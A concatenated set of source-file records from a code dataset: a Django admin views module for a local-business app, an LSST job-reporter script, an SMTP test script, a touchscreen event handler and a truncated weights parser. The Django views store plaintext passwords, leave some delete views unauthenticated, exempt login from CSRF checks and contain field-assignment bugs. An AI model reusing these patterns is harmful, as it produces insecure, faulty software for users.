NotificacionesViewSet(viewsets.ModelViewSet):\n queryset = Notificaciones.objects.all()\n serializer_class = TNotificacionesSerializer\n\n\nclass PermisoViewSet(viewsets.ModelViewSet):\n queryset = Permiso.objects.all()\n serializer_class = TPermisoSerializer\n\n\nclass RolViewSet(viewsets.ModelViewSet):\n queryset = Rol.objects.all()\n serializer_class = TRolSerializer\n\n\nclass RolpermisoViewSet(viewsets.ModelViewSet):\n queryset = Rolpermiso.objects.all()\n serializer_class = TRolpermisoSerializer\n\n\nclass TelefonoViewSet(viewsets.ModelViewSet):\n queryset = Telefono.objects.all()\n serializer_class = TTelefonoSerializer\n\n\nclass UsuarioViewSet(viewsets.ModelViewSet):\n queryset = User.objects.all()\n serializer_class = TUsuarioSerializer\n\nclass UsuarioAPPViewSet(viewsets.ModelViewSet):\n queryset = UserAPP.objects.all()\n serializer_class = TUsuarioAPPSerializer\n\n\nclass PublicidadViewSet(viewsets.ModelViewSet):\n queryset = Publicidad.objects.all()\n serializer_class = TPublicidadSerializer\n\n\ndef index(request):\n #obtener permisos en base al rol anteriro \n lpermisos = obtenerPermisos(request.user)\n return render(request, 'productos/index.html',{'permisos': lpermisos})\n\n\ndef tablaUsuario(request):\n #obtener permisos en base al rol anteriro\n lpermisos = obtenerPermisos(request.user)\n user = User.objects.all()\n contexto = {'usuarios': user ,'permisos': lpermisos }\n return render(request, 'productos/tablaUsuario.html', contexto)\n\n\ndef tablaLocal(request):\n #obtener permisos en base al rol anteriro\n lpermisos = obtenerPermisos(request.user)\n local = Local.objects.all() \n contexto = {'locales': local,'permisos': lpermisos }\n return render(request, 'productos/tablaLocal.html', contexto)\n\n\ndef tableCategoria(request):\n #obtener permisos en base al rol anteriro \n lpermisos = obtenerPermisos(request.user)\n categoria = Categoria.objects.all()\n contexto = {'categorias': categoria,'permisos': lpermisos }\n return render(request, 'productos/tablaCategoria.html', contexto)\n\n\ndef tableFavorito(request):\n #obtener permisos en base al rol anteriro \n lpermisos = obtenerPermisos(request.user)\n favorito = Favorito.objects.all()\n contexto = {'favoritos': favorito,'permisos': lpermisos}\n return render(request, 'productos/tablaFavorito.html', contexto)\n\n\ndef tableTelefono(request):\n #obtener permisos en base al rol anteriro\n lpermisos = obtenerPermisos(request.user) \n telefono = Telefono.objects.all()\n contexto = {'telefonos': telefono,'permisos': lpermisos }\n return render(request, 'productos/tablaTelefono.html', contexto)\n\n\ndef tableGaleria(request):\n lpermisos = obtenerPermisos(request.user)\n galeria = Galeria.objects.all()\n contexto = {'galerias': galeria ,'permisos': lpermisos}\n return render(request, 'productos/tablaGaleria.html', contexto)\ndef tableGaleria2(request):\n #obtener permisos en base al rol anteriro \n lpermisos = obtenerPermisos(request.user)\n locales = []\n user = User.objects.filter(email=request.user).first()\n local = Local.objects.filter(adminLocal=user).all()#filtras que locales tiene ese usuario\n for i in local:\n if i.id_local not in locales:\n locales.append(i.id_local)\n galeria = Galeria.objects.filter(id_local__in=locales)\n contexto = {'galerias': galeria,'permisos': lpermisos}\n return render(request, 'productos/tablaGaleria2.html', contexto)\ndef notificaciones(request):\n #obtener permisos en base al rol anteriro \n lpermisos = obtenerPermisos(request.user)\n notificacion = Notificaciones.objects.all()\n contexto = {'notificaciones': notificacion,'permisos': lpermisos}\n return render(request, 'productos/notificaciones.html', contexto)\ndef localDelete(request):\n #obtener permisos en base al rol anteriro \n lpermisos = obtenerPermisos(request.user)\n if request.method == \"POST\":\n local = Local.objects.get(id_local=request.POST.get('local'))\n local.delete()\n return render(request, 'productos/tablaLocal.html', {\"locales\": Local.objects.all(),'permisos': lpermisos})\n\n\ndef categoriaDelete(request, id_categoria):\n #obtener permisos en base al rol anteriro \n lpermisos = obtenerPermisos(request.user) \n categoria = Categoria.objects.get(id_categoria=id_categoria)\n categoria.delete()\n return render(request, 'productos/tablaCategoria.html', {\"categorias\": Categoria.objects.all(),'permisos': lpermisos})\n\n\ndef favoritoDelete(request, id_favorito):\n #obtener permisos en base al rol anteriro \n lpermisos = obtenerPermisos(request.user) \n favorito = Favorito.objects.get(id_favorito=id_favorito)\n favorito.delete()\n return render(request, 'productos/tablaFavorito.html', {\"favoritos\": Favorito.objects.all(),'permisos': lpermisos})\n\n\ndef telefonoDelete(request, id_telefono):\n #obtener permisos en base al rol anteriro \n lpermisos = obtenerPermisos(request.user) \n telefono = Telefono.objects.get(id_telefono=id_telefono)\n telefono.delete()\n return render(request, 'productos/tablaTelefono.html', {\"telefonos\": Telefono.objects.all(),'permisos': lpermisos})\n\n\ndef galeriaDelete(request, id_contenido):\n #obtener permisos en base al rol anteriro \n lpermisos = obtenerPermisos(request.user) \n galeria = Galeria.objects.get(id_contenido=id_contenido)\n galeria.delete()\n return render(request, 'productos/tablaGaleria.html', {\"galerias\": Galeria.objects.all(),'permisos': lpermisos})\n# ...\n\n\n@csrf_exempt\ndef login(request):\n form = AuthenticationForm()\n if request.method == \"POST\":\n form = AuthenticationForm(data=request.POST)\n if form.is_valid():\n username = form.cleaned_data['username']\n password = form.cleaned_data['password']\n user = authenticate(username=username, password=password)\n print(\"verificando\")\n if user is not None:\n do_login(request, user)\n print(\"si existe\")\n return redirect(\"/tablaLocal\")\n else:\n print(form.is_valid())\n print(\"Password o usuario incorrecto\")\n return render(request, \"productos/login.html\", {'form': form, 'mensaje': \"User o cotrnaseña iconrrecta.\"})\n\n # Si llegamos al final renderizamos el formulario\n return render(request, \"productos/login.html\", {'form': form, 'mensaje': \"\"})\n\ndef obtenerPermisos(user):\n rol = User.objects.all().select_related('id_rol').filter(email=user).values('id_rol')[0]['id_rol']\n dic = Rolpermiso.objects.all().filter(id_rol=rol).values(permiso=F('id_permiso__id_permiso'))\n l = []\n for i in dic:\n if i[\"permiso\"] not in l:\n l.append(i[\"permiso\"])\n return l\n\n@login_required(login_url='/')\ndef logout_view(request):\n logout(request)\n return redirect('/')\n\n\n@login_required(login_url='/')\ndef registrarCategoria(request):\n if request.method == 'POST':\n if(request.POST.get(\"tipo\") != None and request.POST.get(\"descripcion\") != None):\n categoria = Categoria(tipo=request.POST.get(\n \"tipo\"), descripcion=request.POST.get(\"descripcion\"))\n categoria.save()\n # return HttpResponse(status=200)\n return redirect(tablaCategoria)\n return HttpResponse(status=404)\n if request.method == 'GET':\n lpermisos = obtenerPermisos(request.user)\n return render(request, 'productos/crear/crearCategoria.html',{'permisos': lpermisos})\n\n\n@login_required(login_url='/')\ndef registrarLocal(request):\n if request.method == 'POST':\n imagen = request.FILES.get('imagen')\n if imagen != None:\n if( request.POST.get(\"slogan\") != None and request.POST.get(\"latitud\") != None and request.POST.get(\"longitud\") != None and request.POST.get(\"direccion\") != None and request.POST.get(\"nombrec\") != None and request.POST.get(\"descripcion\") != None):\n categoria = Categoria.objects.filter(id_categoria=request.POST.get(\"categoria\")).first()\n local = Local(latitud=request.POST.get(\"latitud\"), estrellas=0, longitud=request.POST.get(\"longitud\"), slogan=request.POST.get(\"slogan\"), vistas=\n 0, descripcion=request.POST.get(\"descripcion\"), likes=0, direccion=request.POST.get(\"direccion\"), nombre_comercial=request.POST.get(\"nombrec\"), src_logo=request.FILES['imagen'],categoria=categoria)\n local.save()\n # return HttpResponse(status=200)\n #return render(request, 'productos/crear/crearLocal.html',{'permisos': lpermisos })\n else:\n if(request.POST.get(\"estrella\") != None and request.POST.get(\"slogan\") != None and request.POST.get(\"latitud\") != None and request.POST.get(\"longitud\") != None and request.POST.get(\"vista\") != None and request.POST.get(\"direccion\") != None and request.POST.get(\"nombrec\") != None and request.POST.get(\"like\") != None and request.POST.get(\"descripcion\") != None):\n categoria = Categoria.objects.filter(id_categoria=request.POST.get(\"categoria\"))\n local = Local(latitud=request.POST.get(\"latitud\"), estrellas=0, longitud=request.POST.get(\"longitud\"), slogan=request.POST.get(\"slogan\"), vistas=0\n , descripcion=request.POST.get(\"descripcion\"), likes=0, direccion=request.POST.get(\"direccion\"), nombre_comercial=request.POST.get(\"nombrec\"),categoria=categoria)\n local.save()\n # return HttpResponse(status=200)\n #return render(request, 'productos/crear/crearLocal.html',{'permisos': lpermisos })\n return redirect(tablaLocal)\n #return HttpResponse(status=404)\n if request.method == 'GET':\n lpermisos = obtenerPermisos(request.user)\n return render(request, 'productos/crear/crearLocal.html', {\"categorias\": Categoria.objects.all(),'permisos': lpermisos})\n\n\n@login_required(login_url='/')\ndef editarLocal(request):\n if request.method == 'POST':\n local = Local.objects.get(id_local=request.POST['local'])\n if(request.POST['nombrec'] != None or request.POST['nombrec'] != ''):\n local.nombre_comercial = request.POST['nombrec']\n if(request.POST['descripcion'] != None or request.POST['descripcion'] != ''):\n local.descripcion = request.POST['descripcion']\n if(request.POST['like'] != None or request.POST['like'] != ''):\n local.likes = request.POST['like']\n if(request.POST['estrella'] != None or request.POST['estrella'] != ''):\n local.estrellas = request.POST['estrella']\n if(request.POST['vista'] != None or request.POST['vista'] != ''):\n local.vistas = request.POST['vista']\n if(request.POST['direccion'] != None or request.POST['direccion'] != ''):\n local.direccion = request.POST['direccion']\n if(request.POST['longitud'] != None or request.POST['longitud'] != ''):\n local.direccion = request.POST['longitud']\n if(request.POST['latitud'] != None or request.POST['latitud'] != ''):\n local.direccion = request.POST['latitud']\n if(request.POST['slogan'] != None or request.POST['slogan'] != ''):\n local.direccion = request.POST['slogan']\n imagen = request.FILES.get('imagen')\n if(imagen!=None):\n local.src_logo = request.FILES['imagen']\n local.save()\n # dispositivos=FCMDevice.objects.filter(active=True)\n # dispositivos.send_message(\n # title=\"local se agrego\"+request.POST['nombrec'],\n # body=\"se ha agregado un local\"\n # )\n return redirect(tablaLocal)\n\n\n@login_required(login_url='/')\ndef registrarUsuario(request):\n #lpermisos = obtenerPermisos(request.user)\n print(request.method)\n \n if request.method == 'POST':\n src_imagen = request.FILES.get('imagen')\n if src_imagen!=None:\n if(request.POST.get(\"email\") != None and request.POST.get(\"nombre\") != None and request.POST.get(\"apellido\") != None and request.POST.get(\"contrasena\") != None and request.POST.get(\"telefono\") != None and request.FILES[\"imagen\"] != None):\n rol = Rol.objects.all().filter(id_rol=request.POST.get(\"rol\")).first()\n usuario = User(username=request.POST.get(\"email\").split('@')[0], email=request.POST.get(\"email\"), nombres=request.POST.get(\"nombre\"), first_name=request.POST.get(\"nombre\"), contrasena=request.POST.get(\n \"contrasena\"), password=make_password(request.POST.get(\"contrasena\")), telefono=request.POST.get(\"telefono\"), apellidos=request.POST.get(\"apellido\"), last_name=request.POST.get(\"apellido\"), src_imagen=request.FILES['imagen'],id_rol=rol)\n usuario.save()\n #return redirect(tablaUsuario)\n # return HttpResponse(status=200)\n #return render(request, 'productos/crear/crearUsuario.html',{'permisos': lpermisos })\n else: \n messages.warning(request, 'No se pudo registrar Usuario.')\n else:\n if(request.POST.get(\"email\") != None and request.POST.get(\"nombre\") != None and request.POST.get(\"apellido\") != None and request.POST.get(\"contrasena\") != None and request.POST.get(\"telefono\") != None ):\n rol = Rol.objects.all().filter(id_rol=request.POST.get(\"rol\")).first()\n usuario = User(username=request.POST.get(\"email\").split('@')[0], email=request.POST.get(\"email\"), nombres=request.POST.get(\"nombre\"), first_name=request.POST.get(\"nombre\"), contrasena=request.POST.get(\n \"contrasena\"), password=make_password(request.POST.get(\"contrasena\")), telefono=request.POST.get(\"telefono\"), apellidos=request.POST.get(\"apellido\"), last_name=request.POST.get(\"apellido\"),id_rol=rol)\n usuario.save()\n else: \n messages.warning(request, 'No se pudo registrar Usuario.')\n return redirect(tablaUsuario)\n \n if request.method == 'GET':\n lpermisos = obtenerPermisos(request.user)\n return render(request, 'productos/crear/crearUsuario.html', {\"roles\": Rol.objects.all(), 'permisos': lpermisos})\n\n\n@login_required(login_url='/')\ndef editarUsuario(request):\n if request.method == 'POST':\n usuario = User.objects.get(email=request.POST['email'])\n if(request.POST['email'] != None or request.POST['email'] != ''):\n usuario.email = request.POST['email']\n if(request.POST['nombres'] != None or request.POST['nombres'] != ''):\n usuario.nombres = request.POST['nombres']\n if(request.POST['apellidos'] != None or request.POST['apellidos'] != ''):\n usuario.apellidos = request.POST['apellidos']\n if(request.POST['contrasena'] != None or request.POST['contrasena'] != ''):\n usuario.contrasena = request.POST['contrasena']\n if(request.POST['telefono'] != None or request.POST['telefono'] != ''):\n usuario.telefono = request.POST['telefono']\n # if(request.POST['id_rol']!=None or request.POST['id_rol']!=''):\n \n # usuario.id_rol=rol\n if(bool(request.FILES.get('imagen', False)) == True):\n usuario.src_imagen = request.FILES['imagen']\n usuario.save()\n return redirect(tablaUsuario)\n #return render(request, 'productos/tablaUsuario.html', {\"usuarios\": User.objects.all()})\n\n\n@login_required(login_url='/')\ndef usuarioDelete(request):\n lpermisos = obtenerPermisos(request.user)\n if request.method == \"POST\":\n usuario = User.objects.get(email=request.POST.get('email'))\n usuario.delete()\n return render(request, 'productos/tablaUsuario.html', {\"usuarios\": User.objects.all() ,'permisos': lpermisos})\n\n@login_required(login_url='/')\ndef registrarPublicidad(request):\n if request.method == 'POST':\n if(request.POST.get(\"descripcion\") != None):\n publicidad = Publicidad(tipo=request.POST.get(\"descripcion\"))\n publicidad.save()\n # return HttpResponse(status=200)\n return render(request, 'productos/crear/crearPublicidad.html')\n return HttpResponse(status=404)\n if request.method == 'GET':\n lpermisos = obtenerPermisos(request.user)\n return render(request, 'productos/crear/crearPublicidad.html',{'permisos': lpermisos})\n@api_view([\"PUT\"])\n@csrf_exempt\ndef update_favorito(request, favorito_id):\n user = request.user.id\n payload = json.loads(request.body)\n try:\n favorito_item = Favorito.objects.filter(added_by=user, id=favorito_id)\n # returns 1 or 0\n favorito_item.update(**payload)\n favorito = Favorito.objects.get(id=favorito_id)\n serializer = TFavoritoSerializer(favorito)\n return JsonResponse({'favorito': serializer.data}, safe=False, status=status.HTTP_200_OK)\n except ObjectDoesNotExist as e:\n return JsonResponse({'error': str(e)}, safe=False, status=status.HTTP_404_NOT_FOUND)\n except Exception:\n return JsonResponse({'error': 'Something terrible went wrong'}, safe=False, status=status.HTTP_500_INTERNAL_SERVER_ERROR)\n@login_required(login_url='/')\ndef registrarNotificaciones(request):\n if request.method == 'POST':\n if(request.POST.get(\"alcance\") != None and request.POST.get(\"notificacion\") != None):\n notificacion = Notificaciones(alcance=request.POST.get(\n \"alcance\"), notificacion=request.POST.get(\"notificacion\"))\n notificacion.save()\n # return HttpResponse(status=200)\n return redirect(tablaCategoria)\n return HttpResponse(status=404)\n if request.method == 'GET':\n lpermisos = obtenerPermisos(request.user)\n return render(request, 'productos/crear/crearNotificacion.html',{'permisos': lpermisos})\n@csrf_exempt\n@require_http_methods(['POST'])\ndef guardar_token(request):\n body=request.body.decode('utf-8')\n bodyDict=json.loads(body)\n token=bodyDict['token']\n existe=FCMDevice.objects.filter(registration_id=token,active=True)\n if len(existe)>0:\n return HttpResponseBadRequest(json.dumps({'mensaje':'el token ya existe'}))\n dispositivo=FCMDevice()\n dispositivo.registration_id=token\n dispositivo.active=True\n #si el usuario esta logeado procede a enlazar\n if request.user.is_authenticated:\n dispositivo.user=request.user\n try:\n dispositivo.save()\n return HttpResponse(json.dumps({'mensaje':'no se ha podido guardar'}))\n except:\n return HttpResponseBadRequest(json.dumps({'mensaje':'no se ha podido guardar'}))","sub_path":"Admin-Backend/productos/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":21769,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"557414885","text":"#!/usr/bin/env python\nimport argparse\n\n# Main code now in lsst.verify; this version for backward-compatibility only.\nfrom lsst.verify.bin.jobReporter import main\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description=('Produce a Job object which can either be used '\n 'to build a local report or to ship to SQuaSH.'))\n parser.add_argument('repository', type=str,\n help='Path to a valid gen3 repository')\n parser.add_argument('collection', type=str,\n help='Collection to search for metric measurement values')\n parser.add_argument('--metrics_package', type=str, default=\"validate_drp\",\n help='Name of metrics package to load, defaults to validate_drp.')\n parser.add_argument('--spec', type=str, default=\"design\",\n help='Spec level to apply: minimum, design, or stretch')\n parser.add_argument('--dataset_name', type=str, default=\"validation_data_hsc\",\n help='Name of the dataset for which the report is being generated. '\n 'Defaults to validation_data_hsc.')\n\n args = parser.parse_args()\n main(args.repository, args.collection, args.metrics_package, args.spec, args.dataset_name)\n","sub_path":"bin.src/make_job_document.py","file_name":"make_job_document.py","file_ext":"py","file_size_in_byte":1314,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"191324492","text":"# config:utf-8\n\nimport smtplib\nfrom email.mime.text import MIMEText\nimport datetime\n\njp=\"iso-2022-jp\"\nmessage=MIMEText(\"メール送信テスト\".encode(jp),\"plain\",jp,)\nfrom_address=\"test@aaa.bb\"\nto_address=\"nao.zima@gmail.com\"\n\nmessage[\"Subject\"]=\"件名\"\nmessage[\"From\"]=from_address\nmessage[\"To\"]=to_address\n\n\nserver=smtplib.SMTP('localhost')\nserver.send_message(message)\n","sub_path":"src/send_mail.py","file_name":"send_mail.py","file_ext":"py","file_size_in_byte":376,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"561835744","text":"# adapted from pimoroni evdev support for the 7 inch capacitive screen\n# added support for the resistive 3.5 and maybe others that doesn't depend upon SDL 1.2\nimport errno\nimport glob\nimport io\nimport os\nimport queue\nimport struct\nimport time\nfrom collections import namedtuple\nimport pygame\n\nimport select\n\nimport debug\n\nTOUCH_X = 0\nTOUCH_Y = 1\n\nTouchEvent = namedtuple('TouchEvent', ('timestamp', 'type', 'code', 'value'))\n\nEV_SYN = 0\nEV_ABS = 3\n\nABS_X = 0\nABS_Y = 1\n\nEV_KEY = 1\nBTN_TOUCH = 330\nABS_MT_SLOT = 0x2f # 47 MT slot being modified\nABS_MT_POSITION_X = 0x35 # 53 Center X of multi touch position\nABS_MT_POSITION_Y = 0x36 # 54 Center Y of multi touch position\nABS_MT_TRACKING_ID = 0x39 # 57 Unique ID of initiated contact\n\nTS_PRESS = 1\nTS_RELEASE = 0\nTS_MOVE = 2\n\n\nclass Touch(object):\n\tdef __init__(self, slot, x, y):\n\t\tself.slot = slot\n\n\t\tself._x = x\n\t\tself._y = y\n\t\tself.last_x = -1\n\t\tself.last_y = -1\n\n\t\tself._id = -1\n\t\tself.events = []\n\t\tself.on_move = None\n\t\tself.on_press = None\n\t\tself.on_release = None\n\n\t@property\n\tdef position(self):\n\t\treturn self.x, self.y\n\n\t@property\n\tdef last_position(self):\n\t\treturn self.last_x, self.last_y\n\n\t@property\n\tdef valid(self):\n\t\treturn self.id > -1\n\n\t@property\n\tdef id(self):\n\t\treturn self._id\n\n\t@id.setter\n\tdef id(self, value):\n\t\tif value != self._id:\n\t\t\tif value == -1 and not TS_RELEASE in self.events:\n\t\t\t\tself.events.append(TS_RELEASE)\n\t\t\telif not TS_PRESS in self.events:\n\t\t\t\tself.events.append(TS_PRESS)\n\n\t\tself._id = value\n\n\t@property\n\tdef x(self):\n\t\treturn self._x\n\n\t@x.setter\n\tdef x(self, value):\n\t\tif value != self._x and not TS_MOVE in self.events:\n\t\t\tself.events.append(TS_MOVE)\n\t\tself.last_x = self._x\n\t\tself._x = value\n\n\t@property\n\tdef y(self):\n\t\treturn self._y\n\n\t@y.setter\n\tdef y(self, value):\n\t\tif value != self._y and not TS_MOVE in self.events:\n\t\t\tself.events.append(TS_MOVE)\n\t\tself.last_y = self._y\n\t\tself._y = value\n\n\tdef handle_events(self):\n\t\t\"\"\"Run outstanding press/release/move events\"\"\"\n\t\tfor event in self.events:\n\t\t\tif event == TS_MOVE and callable(self.on_move):\n\t\t\t\tself.on_move(event, self)\n\t\t\tif event == TS_PRESS and callable(self.on_press):\n\t\t\t\tself.on_press(event, self)\n\t\t\tif event == TS_RELEASE and callable(self.on_release):\n\t\t\t\tself.on_release(event, self)\n\n\t\tself.events = []\n\n\nclass Touches(list):\n\t@property\n\tdef valid(self):\n\t\treturn [tch for tch in self if tch.valid]\n\n\nclass Touchscreen(object):\n\tTOUCHSCREEN_EVDEV_NAME = ('FT5406 memory based driver', 'Goodix Capactivie Touchscreen')\n\tTOUCHSCREEN_RESISTIVE = 'stmpe-ts'\n\tTOUCHSCREEN28CAP = 'EP0110M09'\n\tEVENT_FORMAT = str('llHHi')\n\tEVENT_SIZE = struct.calcsize(EVENT_FORMAT)\n\n\tdef __init__(self):\n\t\tself.touchdefs = {}\n\t\twith open('../touchdefinitions') as f:\n\t\t\tdefs = f.read().splitlines()\n\t\t\tfor l in defs:\n\t\t\t\ttouchitem = l.split('|')\n\t\t\t\tself.touchdefs[touchitem[0]] = touchitem[1:]\n\t\tprint(self.touchdefs)\n\t\tself._use_multitouch = True\n\t\tself.controller = \"unknown\"\n\t\tself._shiftx = 0\n\t\tself._shifty = 0\n\t\tself._flipx = 0 # 0 for ok else size of x from which to subtract touch value\n\t\tself._flipy = 0 # 0 for ok else size of y from which to subtract touch value\n\t\tself._scalex = 1.0\n\t\tself._scaley = 1.0\n\t\tself._capscreen = True\n\t\tself.a = None\n\t\tself._running = False\n\t\tself._thread = None\n\t\tself._f_poll = select.poll()\n\t\tself._f_device = io.open(self._touch_device(), 'rb', self.EVENT_SIZE)\n\t\tself._f_poll.register(self._f_device, select.POLLIN)\n\t\tself.position = Touch(0, 0, 0)\n\t\tself.touches = Touches([Touch(x, 0, 0) for x in range(10)])\n\t\tself._event_queue = queue.Queue()\n\t\tself._touch_slot = 0\n\n\tdef _run(self):\n\t\tself._running = True\n\t\twhile self._running:\n\t\t\tself.poll()\n\t\t\ttime.sleep(0.00001)\n\n\tdef run(self):\n\t\tself._run()\n\n\tdef stop(self):\n\t\tif self._thread is None:\n\t\t\treturn\n\n\t\tself._running = False\n\t\tself._thread.join()\n\t\tself._thread = None\n\n\t@property\n\tdef _current_touch(self):\n\t\treturn self.touches[self._touch_slot]\n\n\tdef close(self):\n\t\tself._f_device.close()\n\n\tdef __enter__(self):\n\t\treturn self\n\n\tdef __exit__(self, exc_type, exc_value, exc_tb):\n\t\tself.close()\n\n\tdef __iter__(self):\n\t\tpass\n\n\tdef _lazy_read(self):\n\t\twhile self._wait_for_events():\n\t\t\tevent = self._f_device.read(self.EVENT_SIZE)\n\t\t\tif not event:\n\t\t\t\tbreak\n\t\t\tyield event\n\n\tdef _get_pending_events(self):\n\t\tfor event in self._lazy_read():\n\t\t\t(tv_sec, tv_usec, ttype, code, value) = struct.unpack(self.EVENT_FORMAT, event)\n\t\t\tself._event_queue.put(TouchEvent(tv_sec + (tv_usec / 1000000), ttype, code, value))\n\n\tdef _wait_for_events(self, timeout=2):\n\t\treturn self._f_poll.poll(timeout)\n\n\tdef poll(self):\n\t\tself._get_pending_events()\n\n\t\twhile not self._event_queue.empty():\n\t\t\tevent = self._event_queue.get()\n\t\t\tdebug.debugPrint('LLTouch', 'Touch: ' + str(event))\n\t\t\tself._event_queue.task_done()\n\n\t\t\tif event.type == EV_SYN: # Sync\n\t\t\t\tfor tch in self.touches:\n\t\t\t\t\ttch.handle_events()\n\t\t\t\treturn self.touches\n\n\t\t\tif event.type == EV_KEY and not self._capscreen:\n\t\t\t\tif event.code == BTN_TOUCH:\n\t\t\t\t\tself._touch_slot = 0\n\t\t\t\t\t# self._current_touch.id = 1\n\t\t\t\t\tif self.a is None:\n\t\t\t\t\t\tself._current_touch.x = self.position.x\n\t\t\t\t\t\tself._current_touch.y = self.position.y\n\t\t\t\t\telse:\n\t\t\t\t\t\tself._current_touch.x = (self.a[2] + self.a[0] * self.position.x + self.a[\n\t\t\t\t\t\t\t1] * self.position.y) / self.a[6]\n\t\t\t\t\t\tself._current_touch.y = (self.a[5] + self.a[3] * self.position.x + self.a[\n\t\t\t\t\t\t\t4] * self.position.y) / self.a[6]\n\t\t\t\t\tif event.value == 1:\n\t\t\t\t\t\tself._current_touch.events.append(TS_PRESS)\n\t\t\t\t\telse:\n\t\t\t\t\t\tself._current_touch.events.append(TS_RELEASE)\n\n\t\t\tif event.type == EV_ABS: # Absolute cursor position\n\t\t\t\tif event.code == ABS_MT_SLOT:\n\t\t\t\t\tself._touch_slot = event.value\n\n\t\t\t\tif event.code == ABS_MT_TRACKING_ID:\n\t\t\t\t\tself._current_touch.id = event.value\n\n\t\t\t\tif event.code == ABS_MT_POSITION_X:\n\t\t\t\t\ttmp = event.value + self._shiftx\n\t\t\t\t\tif self._flipx != 0:\n\t\t\t\t\t\ttmp = self._flipx - event.value\n\t\t\t\t\tif tmp < 0:\n\t\t\t\t\t\tprint('Negative touch position(x): {}'.format(tmp))\n\t\t\t\t\t\ttmp = 0\n\t\t\t\t\tself._current_touch.x = round(tmp * self._scalex)\n\n\t\t\t\tif event.code == ABS_MT_POSITION_Y:\n\t\t\t\t\ttmp = event.value + self._shifty\n\t\t\t\t\tif self._flipy != 0:\n\t\t\t\t\t\ttmp = self._flipy - event.value\n\t\t\t\t\tif tmp < 0:\n\t\t\t\t\t\tprint('Negative touch position(y): {}'.format(tmp))\n\t\t\t\t\t\ttmp = 0\n\t\t\t\t\tself._current_touch.y = round(tmp * self._scaley)\n\n\t\t\t\tif event.code == ABS_X:\n\t\t\t\t\tself.position.x = event.value\n\n\t\t\t\tif event.code == ABS_Y:\n\t\t\t\t\tself.position.y = event.value\n\n\t\treturn []\n\n\tdef _touch_device(self):\n\t\t# return '/dev/input/touchscreen'\n\t\tfor evdev in glob.glob(\"/sys/class/input/event*\"):\n\t\t\ttry:\n\t\t\t\twith io.open(os.path.join(evdev, 'device', 'name'), 'r') as f:\n\t\t\t\t\tdev = f.read().strip()\n\t\t\t\t\tif dev in self.touchdefs:\n\t\t\t\t\t\tself.controller = dev\n\t\t\t\t\t\tvals = self.touchdefs[dev]\n\t\t\t\t\t\tself._shiftx = int(vals[1])\n\t\t\t\t\t\tself._shifty = int(vals[2])\n\t\t\t\t\t\tself._flipx = int(vals[3])\n\t\t\t\t\t\tself._flipy = int(vals[4])\n\t\t\t\t\t\tself._scalex = float(vals[5])\n\t\t\t\t\t\tself._scaley = float(vals[6])\n\t\t\t\t\t\tself._capscreen = bool(vals[0])\n\t\t\t\t\t\treturn os.path.join('/dev', 'input', os.path.basename(evdev))\n\t\t\t\t\t'''\n\t\t\t\t\tif dev in self.TOUCHSCREEN_EVDEV_NAME:\n\t\t\t\t\t\treturn os.path.join('/dev', 'input', os.path.basename(evdev))\n\t\t\t\t\telif dev == self.TOUCHSCREEN_RESISTIVE:\n\t\t\t\t\t\tself._capscreen = False\n\t\t\t\t\t\twith open('/etc/pointercal', 'r') as pc:\n\t\t\t\t\t\t\tself.a = list(int(x) for x in next(pc).split())\n\t\t\t\t\t\t# set to do corrections? TODO read pointercal and set a flag to correct\n\t\t\t\t\t\treturn os.path.join('/dev', 'input', os.path.basename(evdev))\n\t\t\t\t\telif dev == self.TOUCHSCREEN28CAP:\n\t\t\t\t\t\tself._flipx = 0 # 240 todo auto fix orientation?\n\t\t\t\t\t\tself._flipy = 0 # 320\n\t\t\t\t\t\treturn os.path.join('/dev', 'input', os.path.basename(evdev))\n\t\t\t\t\t'''\n\t\t\texcept IOError as e:\n\t\t\t\tif e.errno != errno.ENOENT:\n\t\t\t\t\traise\n\t\traise RuntimeError('Unable to locate touchscreen device')\n\n\tdef read(self):\n\t\treturn next(iter(self))\n\n\nif __name__ == \"__main__\":\n\timport signal\n\n\tpygame.init()\n\tpygame.fastevent.init()\n\tminx = 1000000\n\tmaxx = -1000000\n\tminy = 1000000\n\tmaxy = -1000000\n\ta = [5724, -6, -1330074, 26, 8427, -1034528, 65536]\n\tb = [34, 952, 38, 943]\n\n\tts = Touchscreen()\n\n\tprint('Test touch points:')\n\n\n\tdef handle_event(event, tch):\n\t\tglobal minx, miny, maxx, maxy\n\t\t# xx = (a[2] + a[0] * touch.x + a[1] * touch.y) / a[6]\n\t\t# yy = (a[5] + a[3] * touch.x + a[4] * touch.y) / a[6]\n\t\t# Xx = (touch.x - b[0]) * 320 / (b[1] - b[0])\n\t\t# Xy = (touch.y - b[2]) * 480 / (b[3] - b[2])\n\t\tprint([\"Release\", \"Press\", \"Move\"][event],\n\t\t\t tch.slot,\n\t\t\t tch.x,\n\t\t\t tch.y)\n\t\tminx = min(minx, tch.x)\n\t\tminy = min(miny, tch.y)\n\t\tmaxx = max(maxx, tch.x)\n\t\tmaxy = max(maxy, tch.y)\n\t\treturn\n\t\t# noinspection PyUnreachableCode\n\t\tif event == 1:\n\t\t\te = pygame.event.Event(pygame.MOUSEBUTTONDOWN, {'pos': (tch.x, tch.y)})\n\t\t\tpygame.fastevent.post(e)\n\t\telif event == 0:\n\t\t\te = pygame.event.Event(pygame.MOUSEBUTTONUP, {'pos': (tch.x, tch.y)})\n\t\t\tpygame.fastevent.post(e)\n\n\n\tfor touch in ts.touches:\n\t\ttouch.on_press = handle_event\n\t\ttouch.on_release = handle_event\n\t\ttouch.on_move = handle_event\n\n\ttry:\n\t\tts.run()\n\texcept KeyboardInterrupt:\n\t\tprint(\"Stopping thread...\")\n\t\tprint('MinX: {} MaxX: {} MinY: {} MaxY: {}'.format(minx, maxx, miny, maxy))\n\t\texit()\n","sub_path":"deprecated/test2touchhandler.py","file_name":"test2touchhandler.py","file_ext":"py","file_size_in_byte":9201,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"520234239","text":"import numpy as np\nimport scipy.io\nfrom typing import Iterable, Tuple\n\n\nclass MatlabWeightsParser(object):\n \"\"\"\n Class for handling matconvnet weights.\n \"\"\"\n def __init__(self, weights_path: str, layer_names: Iterable[str]):\n \"\"\"\n :param weights_path: path to matconvnet file.\n :param layer_names: names of convnet for which weight are loading.\n \"\"\"\n\n self._data = 